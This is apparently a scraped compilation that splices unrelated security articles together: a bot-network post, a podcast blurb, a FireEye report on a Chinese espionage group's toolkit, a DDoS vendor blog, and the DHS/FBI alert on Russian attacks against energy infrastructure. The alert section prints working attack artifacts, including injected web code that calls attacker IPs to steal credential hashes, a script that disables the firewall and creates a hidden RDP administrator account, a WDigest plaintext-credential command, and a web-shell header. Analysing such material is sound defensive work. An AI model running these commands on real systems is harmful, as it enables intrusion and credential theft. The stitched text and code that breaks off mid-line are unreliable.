Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.

If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same GitHub repo.

The Wizard of Value – Enterprise Security Weekly #83

This week, Rami Essaid, Founder of Distil Networks, joins us for an interview! In the news, we have updates from CyberArk, Tenable, Fortinet, & Rapid7! Our very own Michael Santarcangelo is joined by Matt Alderman on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor, also reported as “Orz,” that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.
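
Single-byte XOR obfuscation like HOMEFRY's (key 0x56) is its own inverse, so recovering the cleartext strings from a sample is trivial. A minimal sketch:

```python
def xor_decode(data: bytes, key: int = 0x56) -> bytes:
    """Reverse a single-byte XOR obfuscation; XOR is its own inverse,
    so the same function both encodes and decodes."""
    return bytes(b ^ key for b in data)

# Round trip: obfuscate, then recover ("secret" is just example data)
assert xor_decode(xor_decode(b"secret")) == b"secret"
```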

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.


The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.







HOMEFRY, a 64-bit Windows password dumper/cracker



MURKYTOP, a command-line reconnaissance tool 



AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators






AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages



Beacon, a commercially available backdoor



PHOTO, also reported as Derusbi



BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

The US Government Vs Botnets

U.S. government agencies are working hard to solve the problem of botnets and other cyber threats, and are asking for input from various stakeholders. In July 2017 the National Institute of Standards and Technology (NIST) conducted a workshop on “Enhancing Resilience of the Internet and Communications Ecosystem.” The proceedings of that workshop were published as NISTIR 8192, “Enhancing Resilience of the Internet and Communications Ecosystem: A NIST Workshop Proceedings.” Then, in early January the US Secretary of Commerce and Secretary of Homeland Security submitted “A Report to the President on Enhancing the Resilience of the Internet and Communications Ecosystem against Botnets and Other Automated, Distributed Threats.”

To follow up on that report, which was open to public comments for 30 days, NIST conducted a second workshop, “Enhancing Resilience of the Internet & Communications.” The workshop was held February 28–March 1 at NIST’s National Cybersecurity Center of Excellence (NCCoE) in Rockville, Maryland.

The workshop discussed substantive public comments, including open issues, on the draft report about actions to address automated and distributed threats to the digital ecosystem as part of the activity directed by Executive Order 13800, “Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure.” According to the NIST website, “The Departments of Commerce and Homeland Security seek to engage all interested stakeholders—including private industry, academia, civil society, and other security experts—on the draft report, its characterization of the threat landscape, the goals laid out, and the actions to further these goals.” A final report from the departments of Homeland Security and Commerce, incorporating comments and other feedback received, is due to President Trump on May 11, 2018.

These workshops and reports are important steps in the right direction. It seems quite clear to various stakeholders across industry and government sectors that industry-government collaboration is essential to thwart cyber security threats. For starters, government can walk the talk by implementing best security practices and technologies in its operations, whether at federal or state levels. In addition, government can influence the marketplace via regulations and policies that are designed to make the Internet safer. For example, government may mandate that manufacturers build in tighter security for IoT devices, to make it harder for hackers to recruit those devices into botnets. Another possibility is that the government may impose regulations on Internet service providers, requiring them to provide protection from DDoS attacks, for example.

The Departments of Commerce and Homeland Security response to the President’s Executive Order calls for businesses to improve their resilience to DDoS attacks. Corero released the “Government Response to Rise in IoT DDoS Botnet Threats” Solution Brief to detail how our solutions help our customers defend themselves against all DDoS attacks and to answer business and consumer requests for better protection from cyber threats. In general, businesses and consumers have influenced the marketplace by asking for (or in some ways, demanding) better protection from cyber threats. Competition inspires vendors to offer better solutions, and enterprises to adopt those solutions. For the sake of risk management, many companies have already taken steps to increase cyber security. And many telecommunications companies have responded to the market demand for DDoS protection by offering DDoS protection as a service to their customers. On the other hand, some enterprises don’t understand the risks of DDoS attacks or take steps to mitigate them; the government can’t regulate or police all enterprises. If a major website gets attacked (perhaps a bank, or a hospital) and it impacts thousands of civilians, then both civilians and the enterprise are victimized. A case in point was the massive DDoS attack against Dyn, which impacted millions of end-users.

It’s crucial that the U.S. government take steps to advance cyber security. It can’t do it alone, however. When safeguarding the Internet for all users, a multi-stakeholder approach is essential. Though the government can help reduce IoT botnets, it cannot completely eliminate them, partly because the U.S. government can’t completely control what manufacturers do and what end-users do, especially in other countries. No one can assume that vendors around the world will bake in better security for IoT devices, or change their default passwords or update devices with security patches. No matter how heavily IoT devices are regulated or how many consumers are educated, millions of such devices around the world will still be unsecured and vulnerable to being recruited into a botnet.

Read Corero’s Government Response to Rise in IoT DDoS Botnet Threats Solution Brief to learn how our DDoS Defense solutions solve the problem of botnet-driven DDoS attacks. We have been a leader in DDoS protection solutions for over a decade; contact us to learn more about how we can help protect your network from all DDoS attacks.

Alan Turing and the birth of machine intelligence

“We may compare a man in the process of computing a real number to a machine which is only capable of a finite number of conditions…” – Alan Turing


It is difficult to tell the history of AI without first describing the formalization of computation and what it means for something to compute. The primary impetus towards formalization came down to a question posed by the mathematician David Hilbert in 1928.

TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Original release date: March 15, 2018 | Last revised: March 16, 2018

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers


This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.


Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate accounts),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.


Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.


Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
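
Because a .docx is a ZIP archive, this template-injection hook can be spotted defensively by listing any external relationship targets inside the document. A rough sketch (the regex-based parse is a simplification of proper OOXML relationship handling):

```python
import re
import zipfile

def external_template_targets(docx):
    """List external targets (e.g. file:// UNC paths) referenced from a
    .docx's relationship (.rels) files -- the hook used for SMB-based
    credential harvesting. `docx` is a path or file-like object."""
    targets = []
    with zipfile.ZipFile(docx) as doc:
        for name in doc.namelist():
            if not name.endswith(".rels"):
                continue
            xml = doc.read(name).decode("utf-8", errors="ignore")
            # Handle either attribute order within a single element
            targets += re.findall(r'TargetMode="External"[^>]*Target="([^"]+)"', xml)
            targets += re.findall(r'Target="([^"]+)"[^>]*TargetMode="External"', xml)
    # Only SMB-reachable schemes/UNC paths are interesting here
    return [t for t in targets if t.lower().startswith(("file:", "\\\\"))]
```

A document whose attached template points at `file://<remote IP>/Normal.dotm` would show up immediately in this listing.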


Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.


<img src="file[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />


In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:


var i = document.createElement("img");
i.src = "file[:]//184.154.150[.]66/ame_icon.png";
i.width = 3;



Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.


Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects: http://bit[.]ly/2m0x8IH redirected to http://tinyurl[.]com/h3sdqck, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliners[.]com website contained input fields for an email address and password, mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1]


Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.


Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.


Contents of symantec_help.jsp


<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>


The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English.


Contents of enu.cmd


netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /f
net user MS_BACKUP <Redacted_Password> /add
net localgroup Administrators /add MS_BACKUP
net localgroup Administradores /add MS_BACKUP
net localgroup Amministratori /add MS_BACKUP
net localgroup Administratoren /add MS_BACKUP
net localgroup Administrateurs /add MS_BACKUP
net localgroup "Remote Desktop Users" /add MS_BACKUP
net user MS_BACKUP /expires:never
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
sc config termservice start= auto
net start termservice


DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:

Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.

Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.

Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).

Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks.


Scheduled Task

In addition, the threat actors created a scheduled task named “reset”, which was designed to automatically log out of their newly created account every eight hours.


VPN Software

After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks.


Password Cracking Tools

Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open-source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publicly available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\.



Once inside an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the files had .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.

In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:

  • The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.
  • The files were renamed to new extensions, with INST.txt being renamed INST.exe.
  • The files were executed on the host and then immediately deleted.
  • The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.
  • The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key.
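The rename-and-execute pattern above lends itself to a simple triage heuristic. The Python sketch below is illustrative only (the function name and extension list are assumptions, not part of the alert): it flags a download/rename pair in which a benign-looking .txt file was renamed to an executable extension before being run.

```python
import os

# Extensions observed in this campaign after renaming (illustrative set)
EXEC_EXTS = {".exe", ".zip"}

def is_masqueraded_download(downloaded: str, renamed: str) -> bool:
    """Flag a .txt download renamed to an executable extension,
    e.g. INST.txt -> INST.exe as described above."""
    d_root, d_ext = os.path.splitext(downloaded)
    r_root, r_ext = os.path.splitext(renamed)
    return (d_ext.lower() == ".txt"
            and d_root.lower() == r_root.lower()
            and r_ext.lower() in EXEC_EXTS)
```

A hunt over proxy or EDR file-creation telemetry could apply this check to pairs of events on the same host within a short window.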


Persistence Through .LNK File Manipulation

The threat actors manipulated LNK files, commonly known as Microsoft Windows shortcut files, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controlled by the actors. When a user browses to the directory, Windows attempts to load the icon and initiates an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.

Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:


Parsed output for file: desktop.ini.lnk
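The triggering condition for this technique is an icon location that resolves to a remote host. The sketch below is an illustration, not part of the alert: it flags icon paths pointing at a UNC share or file:// URL, the form that causes Windows to attempt the outbound SMB authentication described above.

```python
def is_remote_icon_path(icon_path: str) -> bool:
    """Flag LNK icon locations that point at a remote host (UNC share
    or file:// URL), which can trigger an SMB authentication attempt."""
    p = icon_path.strip().lower()
    return p.startswith("\\\\") or p.startswith("file://")

# Example paths modeled on the observed servers 62.8.193[.]206 and
# 5.153.58[.]45 (the filename here mirrors the ame_icon.png indicator)
suspicious = [p for p in (
    r"\\62.8.193.206\ame_icon.png",        # remote share: credential bait
    r"C:\Windows\system32\shell32.dll",    # normal local icon resource
) if is_remote_icon_path(p)]
```

A defender could run a check like this over icon paths extracted from all .lnk files on user-writable shares, as recommended in the detection guidance later in this alert.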

Registry Modification

The threat actors modified registry settings on key systems so that WDigest would store plaintext credentials in memory. In one instance, the threat actor executed the following command:


reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
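The command above sets UseLogonCredential to 1, which re-enables WDigest plaintext credential caching (on Windows 8.1/Server 2012 R2 and later the value is absent or 0 by default). As a minimal sketch of the interpretation logic (the helper name is hypothetical, not from the alert):

```python
def wdigest_caches_plaintext(use_logon_credential) -> bool:
    """Interpret the WDigest UseLogonCredential registry value:
    1 re-enables plaintext credential caching; 0 or an absent value
    (None) leaves it disabled on modern Windows."""
    return use_logon_credential == 1

# Remediation is the inverse of the attacker's command:
#   reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
#       /v UseLogonCredential /t REG_DWORD /d 0 /f
```

Monitoring for writes to this value is a useful detection on its own, independent of the other indicators in this alert.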


Stage 6: Command and Control

The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx”, “autodiscover.aspx”, and “index.aspx”) for two different web shells. The difference between the two web shells was the “public string Password” field.


Beginning Contents of the Web Shell


<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Assembly Name="System.DirectoryServices,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<script runat = "server">
public string Password = "<REDACTED>";
public string z_progname = "z_WebShell";
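The two marker strings at the end of the listing above can be searched for directly during triage. The sketch below is illustrative (the function name and sample are assumptions): it mirrors the string pair that the z_webshell YARA rule later in this alert keys on.

```python
# Marker strings drawn from the web shell source above
WEBSHELL_MARKERS = (
    'public string Password =',
    'public string z_progname =',
)

def looks_like_z_webshell(source: str) -> bool:
    """Flag ASPX source containing the page directive plus both
    z_webshell marker strings."""
    return source.lstrip().startswith("<%@") and all(
        m in source for m in WEBSHELL_MARKERS)

# Minimal positive example modeled on the listing above
sample = ('<%@ Page Language="C#"%>\n'
          'public string Password = "<REDACTED>";\n'
          'public string z_progname = "z_WebShell";\n')
```

A scan of IIS webroots for files matching this check complements log review of the three observed filenames.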



Stage 7: Actions on Objectives

DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets.


Internal Reconnaissance

Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.

Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:

  • admins.txt
  • completed_dclist.txt
  • completed_trusts.txt
  • completed_zone.txt
  • comps.txt
  • conditional_forwarders.txt
  • domain_zone.txt
  • enum_zones.txt
  • users.txt

The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “” and “”.

The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.

In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.

  1. The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.
  2. The directory “out” is created in the user’s %AppData% folder.
  3. PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.
  4. The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.
  5. The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.
  6. In one instance, DHS observed an “” file created.

DHS observed the threat actors create and modify a text document labeled “ip.txt”, which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts for additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows command “query user” run across the network.


Using <Username> <Password>
Running -s cmd /c query user on <Hostname1>
Running -s cmd /c query user on <Hostname2>
Running -s cmd /c query user on <Hostname3>
<user1>                                              2       Disc       1+19:34         6/27/2017 12:35 PM
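Output files like the “res.txt” sample above can be parsed mechanically when hunting for attacker-collected reconnaissance data. The parser below is an illustrative sketch, not part of the alert; it assumes the five recoverable columns shown above (username, session id, state, idle time, logon time), with the SESSIONNAME column empty for disconnected sessions and therefore absorbed by the two-space split.

```python
import re

def parse_query_user_line(line):
    """Parse one data row of Windows `query user` output into fields.
    Columns are separated by runs of two or more spaces."""
    parts = re.split(r"\s{2,}", line.strip())
    if len(parts) != 5:
        return None  # header row or unexpected layout
    user, sid, state, idle, logon = parts
    return {"user": user, "id": int(sid), "state": state,
            "idle": idle, "logon": logon}

# Sample row modeled on the res.txt excerpt above
row = parse_query_user_line(
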